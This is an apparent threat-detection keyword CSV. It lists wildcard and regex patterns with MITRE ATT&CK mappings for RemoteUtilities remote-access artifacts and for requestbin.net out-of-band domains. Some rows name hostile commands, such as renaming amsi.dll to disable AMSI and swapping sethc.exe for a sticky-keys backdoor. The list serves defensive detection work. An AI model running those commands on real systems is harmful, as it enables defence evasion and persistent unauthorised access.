"*\*-internet-id-log.csv*",".{0,1000}\\.{0,1000}\-internet\-id\-log\.csv.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\Downloaded Installations\*\server-3.3.5.0.msi*",".{0,1000}\\AppData\\Local\\Downloaded\sInstallations\\.{0,1000}\\server\-3\.3\.5\.0\.msi.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\Downloaded Installations\*\viewer-7.2.2.0.msi*",".{0,1000}\\AppData\\Local\\Downloaded\sInstallations\\.{0,1000}\\viewer\-7\.2\.2\.0\.msi.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\*\server-3.3.5.0.exe*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\server\-3\.3\.5\.0\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\*\server-3.3.5.0.msi*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\server\-3\.3\.5\.0\.msi.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\rutserv*",".{0,1000}\\AppData\\Local\\Temp\\rutserv.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\Remote Utilities Files*",".{0,1000}\\AppData\\Roaming\\Remote\sUtilities\sFiles.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\CurrentControlSet\Services\MiniInternetIdService*",".{0,1000}\\CurrentControlSet\\Services\\MiniInternetIdService.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\CurrentVersion\Devices\Remote Utilities Printer*",".{0,1000}\\CurrentVersion\\Devices\\Remote\sUtilities\sPrinter.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\drivers\x64\rupdui.dll*",".{0,1000}\\drivers\\x64\\rupdui\.dll.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\host-7.2.2.0.msi*",".{0,1000}\\host\-7\.2\.2\.0\.msi.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\InternetIdService.exe*",".{0,1000}\\InternetIdService\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\InternetIdService_*-*-*.txt",".{0,1000}\\InternetIdService_.{0,1000}\-.{0,1000}\-.{0,1000}\.txt","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Logs\rut_log_*.html*",".{0,1000}\\Logs\\rut_log_.{0,1000}\.html.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Printers\Remote Utilities Printer\*",".{0,1000}\\Printers\\Remote\sUtilities\sPrinter\\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\ProgramData\Remote Utilities*",".{0,1000}\\ProgramData\\Remote\sUtilities.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\remote utilities - host\*",".{0,1000}\\remote\sutilities\s\-\shost\\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Remote Utilities - Host\*",".{0,1000}\\Remote\sUtilities\s\-\sHost\\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\remote utilities agent\*",".{0,1000}\\remote\sutilities\sagent\\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Remote Utilities Agent\Logs*",".{0,1000}\\Remote\sUtilities\sAgent\\Logs.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Remote Utilities Files\rdp_connections\*",".{0,1000}\\Remote\sUtilities\sFiles\\rdp_connections\\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Remote Utilities Server\*",".{0,1000}\\Remote\sUtilities\sServer\\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Remote Utilities\Logs*",".{0,1000}\\Remote\sUtilities\\Logs.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Remote Utilities\MiniInternetId*",".{0,1000}\\Remote\sUtilities\\MiniInternetId.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\rfusclient.exe*",".{0,1000}\\rfusclient\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\rutserv.exe*",".{0,1000}\\rutserv\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\rutview.exe*",".{0,1000}\\rutview\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ru-viewer-portable\*",".{0,1000}\\ru\-viewer\-portable\\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SOFTWARE\Usoris\Remote Utilities\*",".{0,1000}\\SOFTWARE\\Usoris\\Remote\sUtilities\\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\spool\drivers\x64\rupd.*",".{0,1000}\\spool\\drivers\\x64\\rupd\..{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\System32\rupdpm.dll*",".{0,1000}\\System32\\rupdpm\.dll.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Two Pilots\Agent\Remote Utilities Printer*",".{0,1000}\\Two\sPilots\\Agent\\Remote\sUtilities\sPrinter.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\unidrv_rupd.dll*",".{0,1000}\\unidrv_rupd\.dll.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\unidrv_rupd.hlp*",".{0,1000}\\unidrv_rupd\.hlp.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\unidrvui_rupd.dll*",".{0,1000}\\unidrvui_rupd\.dll.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\unires_vpd.dll*",".{0,1000}\\unires_vpd\.dll.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\viewer-portable-7.2.2.0\*",".{0,1000}\\viewer\-portable\-7\.2\.2\.0\\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\VPDAgent.exe*",".{0,1000}\\VPDAgent\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<a href=""rutils:*",".{0,1000}\<a\shref\=\""rutils\:.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<Data>Product: Remote Utilities - Host -- *",".{0,1000}\<Data\>Product\:\sRemote\sUtilities\s\-\sHost\s\-\-\s.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<Data>Remote Utilities - Host</Data>*",".{0,1000}\<Data\>Remote\sUtilities\s\-\sHost\<\/Data\>.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<Data>Remote Utilities Server<*",".{0,1000}\<Data\>Remote\sUtilities\sServer\<.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<Data>Removed Remote Utilities - Host.</Data>*",".{0,1000}\<Data\>Removed\sRemote\sUtilities\s\-\sHost\.\<\/Data\>.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Installed Remote Utilities - Viewer.*",".{0,1000}\>Installed\sRemote\sUtilities\s\-\sViewer\..{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Installed Remote Utilities Server.</*",".{0,1000}\>Installed\sRemote\sUtilities\sServer\.\<\/.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Product: Remote Utilities - Viewer -- *",".{0,1000}\>Product\:\sRemote\sUtilities\s\-\sViewer\s\-\-\s.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Product: Remote Utilities Server -- *",".{0,1000}\>Product\:\sRemote\sUtilities\sServer\s\-\-\s.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Remote Utilities - Viewer</*",".{0,1000}\>Remote\sUtilities\s\-\sViewer\<\/.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*InternetIdService.exe*",".{0,1000}InternetIdService\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Program Files (x86)\Common Files\Two Pilots*",".{0,1000}Program\sFiles\s\(x86\)\\Common\sFiles\\Two\sPilots.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Remote Utilities Pty (Cy) Ltd.*",".{0,1000}Remote\sUtilities\sPty\s\(Cy\)\sLtd\..{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemoteAdmin.RemoteUtilities*",".{0,1000}RemoteAdmin\.RemoteUtilities.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","#Avsignature","N/A","10","10","N/A","N/A","N/A","N/A"
"*rfusclient.exe *",".{0,1000}rfusclient\.exe\s.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rutserv.exe *",".{0,1000}rutserv\.exe\s.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rutserv.exe /*",".{0,1000}rutserv\.exe\s\/.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rutview.exe *",".{0,1000}rutview\.exe\s.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rutview.exe -*",".{0,1000}rutview\.exe\s\-.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*server.remoteutilities.com*",".{0,1000}server\.remoteutilities\.com.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Trojan.RemoteUtilitiesRAT*",".{0,1000}Trojan\.RemoteUtilitiesRAT.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","#Avsignature","N/A","10","10","N/A","N/A","N/A","N/A"
"*Uninstall Remote Utilities - Viewer.lnk*",".{0,1000}Uninstall\sRemote\sUtilities\s\-\sViewer\.lnk.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Uninstall Remote Utilities Server.lnk*",".{0,1000}Uninstall\sRemote\sUtilities\sServer\.lnk.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Uninstall Remote Utilities.lnk*",".{0,1000}Uninstall\sRemote\sUtilities\.lnk.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*update.remoteutilities.net*",".{0,1000}update\.remoteutilities\.net.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ren C:\Windows\System32\amsi.dll *.dll",".{0,1000}ren\sC\:\\Windows\\System32\\amsi\.dll\s.{0,1000}\.dll","greyware_tool_keyword","ren","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*ren sethc.exe sethcbad.exe*",".{0,1000}ren\ssethc\.exe\ssethcbad\.exe.{0,1000}","greyware_tool_keyword","ren","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*ren sethcold.exe sethc.exe*",".{0,1000}ren\ssethcold\.exe\ssethc\.exe.{0,1000}","greyware_tool_keyword","ren","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*ren sethcold.exe sethc.exe*",".{0,1000}ren\ssethcold\.exe\ssethc\.exe.{0,1000}","greyware_tool_keyword","ren","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*.d.requestbin.net*",".{0,1000}\.d\.requestbin\.net.{0,1000}","greyware_tool_keyword","requestbin.net","allows users to create a unique URL to collect and inspect HTTP requests. It is commonly used for debugging webhooks - it can also be abused by attackers for verifying the reachability and effectiveness of their payloads","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","http://requestbin.net","1","1","N/A","Out of band interaction domains","10","10","N/A","N/A","N/A","N/A"
"*http://requestbin.net/r/*",".{0,1000}http\:\/\/requestbin\.net\/r\/.{0,1000}","greyware_tool_keyword","requestbin.net","allows users to create a unique URL to collect and inspect HTTP requests. It is commonly used for debugging webhooks - it can also be abused by attackers for verifying the reachability and effectiveness of their payloads","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","http://requestbin.net","1","1","N/A","Out of band interaction domains","10","10","N/A","N/A","N/A","N/A"
